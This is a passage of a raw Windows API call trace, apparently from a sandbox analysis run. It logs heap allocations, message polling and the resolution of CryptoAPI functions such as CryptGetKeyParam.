(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0110.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0110.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0110.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0110.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0110.959] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0110.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0110.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ee0 [0110.959] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0110.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ee0 | out: hHeap=0x1780000) returned 1 [0110.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0110.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0110.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0110.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0110.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0110.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0110.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0110.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10c18) returned 0x4516010 [0110.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0110.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2420 [0110.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0110.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0110.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0110.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0110.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0110.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0110.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0110.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2380 [0110.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0110.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0110.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0110.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca100 [0110.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0110.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0110.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0110.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0110.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0110.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10c18) returned 0x4537850 [0110.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0110.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0110.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0110.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0110.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0110.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0110.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0110.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0110.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0110.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0110.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0110.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0110.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0110.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0110.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0110.962] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0110.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0110.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0110.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0110.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0110.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0110.964] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0110.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0110.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0110.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0110.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0110.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0110.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0110.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0110.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0110.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0110.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0110.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0110.964] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0110.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0110.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0110.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0110.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2520 [0110.964] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0110.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0110.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0110.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f38 [0110.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0110.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0110.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0110.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0110.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0110.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0110.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0110.965] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0110.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0110.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0110.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0110.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0110.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0110.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0110.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0110.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0110.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0110.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0110.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0110.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0110.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0110.966] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0110.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0110.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0110.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0110.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0110.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0110.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0110.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0110.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0110.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0110.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0110.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0110.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0110.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0110.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0110.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0110.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0110.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0110.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0110.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0110.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0110.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0110.966] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0110.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0110.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0110.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0110.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0110.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0110.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0110.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0110.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0110.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0110.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0110.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0110.967] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0110.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0110.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca268 [0110.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0110.967] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0110.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0110.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0110.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0110.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0110.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0110.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.967] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0110.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0110.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0110.967] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0110.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0110.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0110.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0110.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0110.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0110.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0110.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0110.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0110.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0110.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0110.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0110.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0110.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0110.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0110.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0110.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0110.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0110.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0110.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0110.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0110.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0110.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0110.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0110.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0110.968] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0110.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0110.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0110.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0110.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0110.968] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0110.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0110.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0110.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0110.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0110.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0110.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0110.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0110.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0110.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0110.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0110.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0110.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0110.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0110.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0110.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0110.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0110.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0110.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0110.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0110.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0110.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0110.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0110.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0110.969] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0110.970] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0110.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0110.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0110.971] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0110.971] HeapFree (in: 